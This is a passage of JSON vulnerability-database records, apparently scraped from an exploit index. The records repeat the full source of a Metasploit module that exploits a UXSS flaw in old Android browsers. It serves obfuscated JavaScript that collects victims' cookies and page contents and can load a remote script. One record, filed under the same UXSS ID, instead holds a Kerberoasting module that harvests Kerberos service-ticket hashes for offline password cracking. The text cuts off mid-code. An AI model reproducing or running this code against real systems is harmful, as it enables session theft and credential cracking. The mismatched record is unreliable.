["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T09:57:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-04-02T09:57:18", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 69}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-05-28T20:23:01", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806", "OPENVAS:1361412562310891805", "OPENVAS:1361412562310891802", "OPENVAS:1361412562310704452", "OPENVAS:1361412562310704451", "OPENVAS:1361412562310891804", "OPENVAS:1361412562310891803", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994259"]}], "modified": "2019-05-28T20:23:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:23:01", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "18ec0cf23b5555ddd3209e9b37ae9031", "type": "metasploit", "bulletinFamily": "exploit", "title": "Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)", "description": "This module will try to find Service Principal Names that are associated with normal user accounts. Since normal accounts' passwords tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs. This is part of the kerberoast attack research by Tim Medin (@timmedin).\n", "published": "2018-03-16T13:11:49", "modified": "2018-08-27T21:06:07", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py", "https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf"], "cvelist": [], "lastseen": "2019-06-08T22:26:07", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806", "OPENVAS:1361412562310891805", "OPENVAS:1361412562310891802", "OPENVAS:1361412562310704452", "OPENVAS:1361412562310704451", "OPENVAS:1361412562310891804", "OPENVAS:1361412562310891803", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994259"]}], "modified": "2019-05-28T20:23:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/get_user_spns.py", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom datetime import datetime\nfrom binascii import hexlify, unhexlify\n\n# extra modules\ndependencies_missing = False\ntry:\n from pyasn1.codec.der import decoder\n from impacket import version\n from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT\n from impacket.examples import logger\n from impacket.krb5 import constants\n from impacket.krb5.asn1 import TGS_REP\n from impacket.krb5.ccache import CCache\n from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS\n from impacket.krb5.types import Principal\n from impacket.ldap import ldap, ldapasn1\n from impacket.smbconnection import SMBConnection\n from impacket.ntlm import compute_lmhash, compute_nthash\nexcept ImportError:\n dependencies_missing = True\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)',\n 'description': '''\n This module will try to find Service Principal Names that are associated with normal user accounts.\n Since normal accounts' passwords tend to be shorter than machine accounts, and knowing that a TGS request\n will encrypt the ticket with the account the SPN is running under, this could be used for an offline\n bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.\n This is part of the kerberoast attack research by Tim Medin (@timmedin).\n ''',\n 'authors': [\n 'Alberto Solino', # impacket example\n 'Jacob Robles' # Metasploit module conversion\n ],\n 'date': '2014-09-27',\n 'license': 'CORE_LICENSE',\n 'references': [\n {'type': 'url', 'ref': 'https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py'},\n {'type': 'url', 'ref': 'https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf'}\n ],\n 'type': 'single_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},\n 'domain': {'type': 'string', 'description': 'The target Active Directory domain', 'required': True, 'default': None},\n 'user': {'type': 'string', 'description': 'Username for a domain account', 'required': True, 'default': None},\n 'pass': {'type': 'string', 'description': 'Password for the domain user account', 'required': True, 'default': None}\n },\n 'notes': {\n 'AKA': [\n 'GetUserSPNs.py',\n 'Kerberoast'\n ]\n }}\n\nclass GetUserSPNs:\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n module.log('{}'.format(outputFormat.format(*header)), level='good')\n module.log('{}'.format(' '.join(['-' * itemLen for itemLen in colLen])), level='good')\n\n # And now the rows\n for row in items:\n module.log('{}'.format(outputFormat.format(*row)), level='good')\n\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__outputFileName = None #options.outputfile\n self.__aesKey = None #cmdLineOptions.aesKey\n self.__doKerberos = False #cmdLineOptions.k\n self.__target = None\n self.__requestTGS = True #options.request\n self.__kdcHost = cmdLineOptions['dc_ip']\n self.__saveTGS = False #cmdLineOptions.save\n self.__requestUser = None #cmdLineOptions.request_user\n #if cmdLineOptions.hashes is not None:\n # self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n def getMachineName(self):\n if self.__kdcHost is not None:\n s = SMBConnection(self.__kdcHost, self.__kdcHost)\n else:\n s = SMBConnection(self.__domain, self.__domain)\n try:\n s.login('', '')\n except Exception:\n if s.getServerName() == '':\n raise('Error while anonymous logging into %s' % self.__domain)\n else:\n s.logoff()\n return s.getServerName()\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def getTGT(self):\n try:\n ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))\n except:\n pass\n else:\n domain = self.__domain\n principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())\n creds = ccache.getCredential(principal)\n if creds is not None:\n TGT = creds.toTGT()\n module.log('Using TGT from cache', level='debug')\n return TGT\n else:\n module.log('No valid credentials found in cache', level='debug')\n\n # No TGT in cache, request it\n userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the\n # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the\n # cleartext password.\n # If no clear text password is provided, we just go with the defaults.\n try:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,\n compute_lmhash(password),\n compute_nthash(password), self.__aesKey,\n kdcHost=self.__kdcHost)\n except Exception, e:\n module.log('Exception for getKerberosTGT', level='error')\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(self.__lmhash),\n unhexlify(self.__nthash), self.__aesKey,\n kdcHost=self.__kdcHost)\n\n TGT = {}\n TGT['KDC_REP'] = tgt\n TGT['cipher'] = cipher\n TGT['sessionKey'] = sessionKey\n return TGT\n\n def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn):\n decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]\n\n # According to RFC4757 the cipher part is like:\n # struct EDATA {\n # struct HEADER {\n # OCTET Checksum[16];\n # OCTET Confounder[8];\n # } Header;\n # OCTET Data[0];\n # } edata;\n #\n # In short, we're interested in splitting the checksum and the rest of the encrypted data\n #\n if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n else:\n pass\n\n\n def run(self):\n self.__target = self.__kdcHost\n\n # Connect to LDAP\n try:\n ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)\n ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n except ldap.LDAPSessionError, e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)\n ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n raise\n\n # Building the search filter\n searchFilter = \"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))\"\n\n try:\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['servicePrincipalName', 'sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap.LDAPSearchError, e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n module.log('sizeLimitExceeded exception caught, giving up and processing the data received', level='debug')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n else:\n raise\n\n answers = []\n module.log('Total of records returned {}'.format(len(resp)), level='info')\n\n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n SPNs = []\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if attribute['type'] == 'sAMAccountName':\n if str(attribute['vals'][0]).endswith('$') is False:\n # User Account\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif attribute['type'] == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n elif attribute['type'] == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif attribute['type'] == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = '<never>'\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif attribute['type'] == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = '<never>'\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif attribute['type'] == 'servicePrincipalName':\n for spn in attribute['vals']:\n SPNs.append(str(spn))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n module.log('Bypassing disabled account {}'.format(sAMAccountName), level='debug')\n else:\n for spn in SPNs:\n answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])\n except Exception, e:\n module.log('Skipping item, cannot process due to error', level='error')\n\n if len(answers)>0:\n self.printTable(answers, header=[\"ServicePrincipalName\", \"Name\", \"MemberOf\", \"PasswordLastSet\", \"LastLogon\"])\n\n if self.__requestTGS is True:\n # Let's get unique user names and a SPN to request a TGS for\n users = dict( (vals[1], vals[0]) for vals in answers)\n\n # Get a TGT for the current user\n TGT = self.getTGT()\n for user, SPN in users.iteritems():\n try:\n serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,\n self.__kdcHost,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN)\n except Exception , e:\n module.log('SPN Exception: {} - {}'.format(SPN, str(e)), level='error')\n\n else:\n module.log('No entries found!', level='info')\n\n\ndef run(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket, pyasn1, pyOpenSSL) missing, cannot continue', level='error')\n return\n\n options = {}\n options['dc_ip'] = args['rhost']\n executer = GetUserSPNs(args['user'], args['pass'], args['domain'], options)\n executer.run()\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T22:26:07", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 71}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-09T00:24:11", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-09T00:24:11"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}, {"type": "threatpost", "idList": ["THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891815", "OPENVAS:1361412562310852544", "OPENVAS:1361412562310876460", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310704456", "OPENVAS:1361412562310891814", "OPENVAS:1361412562310876458", "OPENVAS:1361412562310876462", "OPENVAS:1361412562310876461", "OPENVAS:1361412562310876463"]}, {"type": "zdt", "idList": ["1337DAY-ID-32847"]}], "modified": "2019-06-09T00:24:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial 